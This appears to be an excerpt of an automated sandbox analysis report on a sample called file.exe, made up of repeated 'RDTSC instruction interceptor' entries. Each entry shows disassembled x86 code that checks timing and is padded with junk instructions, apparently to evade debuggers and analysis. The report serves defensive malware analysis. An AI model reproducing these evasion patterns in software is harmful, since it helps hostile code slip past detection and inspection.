                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DBCA8 second address: 11DBD6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnp 00007F5C20C5AC42h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr [ebp+122D3266h], ebx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007F5C20C5AC38h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e call 00007F5C20C5AC45h 0x00000043 sub ebx, dword ptr [ebp+122D316Ch] 0x00000049 pop ebx 0x0000004a mov eax, dword ptr [ebp+122D02E1h] 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F5C20C5AC38h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000015h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a xor ebx, dword ptr [ebp+122D2C0Bh] 0x00000070 mov edi, ecx 0x00000072 push FFFFFFFFh 0x00000074 mov edi, dword ptr [ebp+12458609h] 0x0000007a xor dword ptr [ebp+122D3A03h], edi 0x00000080 push eax 0x00000081 jns 00007F5C20C5AC40h 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEBF3 second address: 11DEC01 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFB75 second address: 11DFBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5C20C5AC4Eh 0x0000000f je 00007F5C20C5AC48h 0x00000015 jmp 00007F5C20C5AC42h 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F5C20C5AC38h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 sub dword ptr [ebp+122D21EDh], edx 0x0000003b push esi 0x0000003c mov dword ptr [ebp+12481B1Dh], ecx 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 mov ebx, dword ptr [ebp+122D2E2Bh] 0x0000004b js 00007F5C20C5AC3Ch 0x00000051 push 00000000h 0x00000053 mov edi, dword ptr [ebp+122D3162h] 0x00000059 xchg eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c je 00007F5C20C5AC38h 0x00000062 push edi 0x00000063 pop edi 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFBEE second address: 11DFC00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F5C2120954Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DEECB second address: 11DEEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C20C5AC48h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push esi 0x0000000d jng 00007F5C20C5AC3Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFD41 second address: 11DFD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DFD46 second address: 11DFD5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5C20C5AC41h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E1B6E second address: 11E1B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5C2120954Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E1B83 second address: 11E1B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E3EAC second address: 11E3EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jg 00007F5C21209550h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E502B second address: 11E5050 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f jbe 00007F5C20C5AC44h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E5050 second address: 11E5054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6034 second address: 11E603A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E6241 second address: 11E6247 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8320 second address: 11E833F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5C20C5AC48h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F367E second address: 11F368B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5C21209546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5950 second address: 11F595A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5C20C5AC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F595A second address: 11F5964 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5C21209552h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5964 second address: 11F596A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187D83 second address: 1187DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F5C2120954Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F5C21209556h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187DB1 second address: 1187DC1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C20C5AC36h 0x00000008 jnl 00007F5C20C5AC36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191A4A second address: 1191A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C21209553h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9F6F second address: 11F9F74 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200154 second address: 1200162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200162 second address: 120016C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200431 second address: 1200439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200439 second address: 120043E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200855 second address: 120086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209555h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120086E second address: 120088E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop esi 0x0000000a jl 00007F5C20C5AC5Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007F5C20C5AC3Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200A32 second address: 1200A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1200A36 second address: 1200A55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F5C20C5AC4Dh 0x0000000c jmp 00007F5C20C5AC41h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BBD second address: 1208BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5C21209546h 0x0000000a jmp 00007F5C21209553h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5C21209556h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BF3 second address: 1208BF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208BF7 second address: 1208BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207E8C second address: 1207EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5C20C5AC36h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007F5C20C5AC36h 0x00000014 popad 0x00000015 jmp 00007F5C20C5AC3Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5C20C5AC3Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207EC0 second address: 1207EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1207EC4 second address: 1207EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208301 second address: 1208308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208308 second address: 120831E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5C20C5AC3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12084C5 second address: 12084D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F5C21209546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12088F3 second address: 12088F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12088F9 second address: 1208917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209554h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208917 second address: 1208921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5C20C5AC36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208921 second address: 1208925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1208925 second address: 1208943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007F5C20C5AC36h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 js 00007F5C20C5AC3Eh 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD9EE second address: 11CD9F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CD9F3 second address: 11CD9FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC51 second address: 11CDC57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC57 second address: 11CDC7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F5C20C5AC36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDC7C second address: 11CDC82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDD9F second address: 11CDDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDDA3 second address: 11CDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDDAC second address: 11CDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDF0B second address: 11CDF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5C21209555h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CDF25 second address: 11CDF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F5C20C5AC38h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE4FA second address: 11CE500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE832 second address: 11CE836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE836 second address: 11CE83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8E5 second address: 11CE8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8EB second address: 11CE8F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE8F0 second address: 11CE991 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F5C20C5AC45h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F5C20C5AC44h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F5C20C5AC38h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+1248337Eh] 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F5C20C5AC38h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d mov ecx, dword ptr [ebp+122D310Eh] 0x00000053 sub dword ptr [ebp+122D35A6h], esi 0x00000059 nop 0x0000005a jmp 00007F5C20C5AC44h 0x0000005f push eax 0x00000060 jg 00007F5C20C5AC40h 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE991 second address: 11CE9AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D345Ch], edi 0x0000000d lea eax, dword ptr [ebp+1248333Ah] 0x00000013 stc 0x00000014 nop 0x00000015 push ecx 0x00000016 jo 00007F5C2120954Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9AF second address: 11CE9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9BA second address: 11CE9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9BE second address: 11CE9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE9C2 second address: 11B68BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5C21209555h 0x0000000c pop eax 0x0000000d popad 0x0000000e nop 0x0000000f call dword ptr [ebp+122D216Bh] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007F5C2120954Ah 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189801 second address: 1189807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189807 second address: 1189826 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5C21209546h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 jbe 00007F5C2120954Eh 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1189826 second address: 118982A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118982A second address: 1189830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C2C5 second address: 120C2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 jne 00007F5C20C5AC36h 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C58D second address: 120C599 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5C21209546h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C6E5 second address: 120C6ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9C2 second address: 120C9CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9CC second address: 120C9D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5C20C5AC3Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9D8 second address: 120C9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9E1 second address: 120C9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120C9E9 second address: 120CA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5C21209550h 0x0000000f jbe 00007F5C21209546h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBA2 second address: 120CBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBA6 second address: 120CBCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5C21209546h 0x00000008 jmp 00007F5C21209559h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBCD second address: 120CBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBD1 second address: 120CBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBD5 second address: 120CBDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120CBDB second address: 120CBE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5C21209546h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1216A2A second address: 1216A36 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5C20C5AC36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11985C8 second address: 11985D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F5C21209546h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11985D7 second address: 11985EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C20C5AC44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
